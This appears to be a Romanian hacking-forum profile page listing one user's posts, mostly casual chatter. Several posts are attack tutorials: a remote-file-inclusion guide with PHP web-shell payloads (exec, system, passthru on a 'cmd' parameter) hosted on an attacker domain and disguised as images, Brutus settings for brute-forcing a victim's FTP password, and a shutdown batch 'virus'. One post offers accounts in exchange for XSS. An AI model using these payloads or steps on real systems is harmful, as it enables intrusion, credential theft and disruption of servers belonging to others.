-
Posts
990 -
Joined
-
Last visited
-
Days Won
4
Posts posted by curiosul
-
-
Normal ca merge si fara placa wireless, ori iti cumperi adaptor wireless ori iti cumperi placa wireless, acelasi lucru
-
O da, deabia astept un telefon care sa-mi prepare un hamburger
-
Pai ce, acuma trebuie sa inlocuiesc plantele cu apa?
Sau nu, cred ca apa e prea tare ca plantele mele
-
so, asta chiar ca ma sperie
-
-
Am scos la imprimanta 12 exemplare si tot nu am reusit;
Cred ca este imposibil;
De acord cu loki
-
AaAaa? Despre ce este vorba? aAaAa?
Chiar nu m-am prins
-
) Tu ai modificat-o?
-
Tare tare astea, si ii faina si reclama originala ce mai....
-
si cam ce resurse ar cere ca sa stiu inainte sa-l descac...
-
e pa naiba
-
Parca azi era vorba sa inacepem...da nu vad pe nimeni care sa fi postat ceva pe site
-
Tehnica destul de celebra (RFI) , permite includerea mai multor arhive in alte servere ; majoritatea vulnerabilitatilor de genul asta se gasesc in coduri cum ar fi :
<?include"$page";
?>
Asta ar fi exploatat in modul urmator :
vuln.php?page=http//[atacant]Normal ar fi sa trimitem la o pagina care sa poata executa comenzile.
Arhiva poate contine :
<?exec($_GET[cmd],$iesire);
foreach($iesire as $line) { echo "$line<br>"; }
?>
exec();
<?system($_GET[cmd],$iesire);
foreach($iesire as $line) { echo "$line<br>"; }
?>
system();
<?passthru($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
passthru();
Odata ce aveti arhiva cu codul , puneti o extensie .jpg sau .gif. Uploadati pe serverul victima , si totul este pregatit . Acum imaginativa ca avem adresa : http://atacant.com/xploitulnostru.gif . In xpl.gif trebuie sa fie unul din cele 3 coduri de mai sus . Fiecare cod din cele 3 foloseste o varianta distincta , pt ca unele servere pot bloca unele dintre ele .
Acum faceti un url asa : victima.com: The Leading Personal Injury Site on the Net
Si asta executa xploitul vostru , si primiti un fel de shell .
Ce poti face cu asta ?
Mai multe ... poti executa comanda cat de ex , si sa vezi arhive (de configurare de ex) , deasemenea puteti face cat in arhivele altor useri ("cd/home/gheorghe/public_html;") cat si "config.php"
sau sa obtineti o lista de arhive ("cd/home/gheorghe/public_html;ls")
Tutorialul nu este cine stie ce...este pentru incepatori...
Si nu-mi asum responsabilitatea pentru contextul in care folositi tutorialul
-
)acuma am vazut..da io am primit tutorialul asta de la altcineva man
Nu l-am luat de pe site la tine...pur si simplu mi-a dat acest trick..asta-i tot
Ai putea sa verifici ip-urile de pe site la tine..ca n-am intrat niciodata decat azi...cand mi-ai dat llink-ul ala:P
Si vorbeste si tu mai frumos omule fara coaie
-
Click4Trick
nu da credite , primul care te ia la morti o sa fiu eu
Nu inteleg ce vrei sa spui si care ii problema ta ...
-
Pai asa este...dar este si asta o metoda...trebuie doar noroc cat incape
Dar nu e chiar imposibil
-
Pentru a cracka un ftp , ai nevoie de :
brutus
ms-dos
Metoda e putin cam lenta, insa sigura .
Cum se face :
-deschide cmd si scrie : ping www.adresa.com (si obtii ipul victimei)
-acum deschideti brutus , si unde scrie FTP , puneti ipul pe care l-ati obtinut cand ati facut pingul
(verificati ca ftpul e activ)
-configurati brutus :
target : ftp:victima.com
type : ftp
port : 21
connections : 34
timeout : 10
userid : victimaa
passfile : biblioteca voastra de passuri
-dupa ce ati configurat , dati start , si asteptati sa gaseasca passwordul. (poate dura ceva timp .... cu cat mai mare biblioteca ta , cu atat mai bine)
-
) chiar ca io prins cu mata-n sac
-
Pentru a obtine o imagine mai clara adaugati :
&feature=related&fmt=18Asadar ar arata cam asa :
Cateodate filmuletele vin cu o parte din cod :
asa ca adaugati doar ce lipseste :
&fmt=18Sper sa fie de folos
-
pentru ca verifica semnatura digitala (hashul md5).
arhiveaza-l si pune parola rstcenter.
Si daca pune parola nu o sa-l mai stearga?
-
Si cum se foloseste? Cu ce trebuie sa completez pe acolo...
-
@echo off
shutdown -s -t 00
exit
.bat ...nui cine stie ce...
Am creat cativa si vad ca toti "virusii" astea au aceeasi baza... .bat
-
Cat despre revista, ne-ar trebui articole scrise de noi, nu luate dupa Google. Si nu am vazut prea multe articole scrise pe aici... Cu alte cuvinte cineva ar trebui sa munceasca, sa isi piarda o parte din timp pentru revista, si nu cred ca sunt prea multi doritori. Totusi eu m-as baga.
Da, si sa stie limba romana...
-
Si eu conturi pe filelist, scenefz si atte trackere pt xss valid in yahoo...
Locuri de munca pentru oamenii de pe RST
in Off-topic
Posted
Da cred ca ar iesi ceva, avand in vedere afacerea asta cred ca nu trebuie sa investesti cine stie ce, dar ca sa ai firma si angajati iti trebuie si clienti, iar promovarea in mass-media ii destul de scumpa, dar daca punem toti mana de la mana ar merge, dar sunt si alte multe aspecte catre trebuie discutate.
Tu ce ai scris mai sus ii doar o schema a afacerii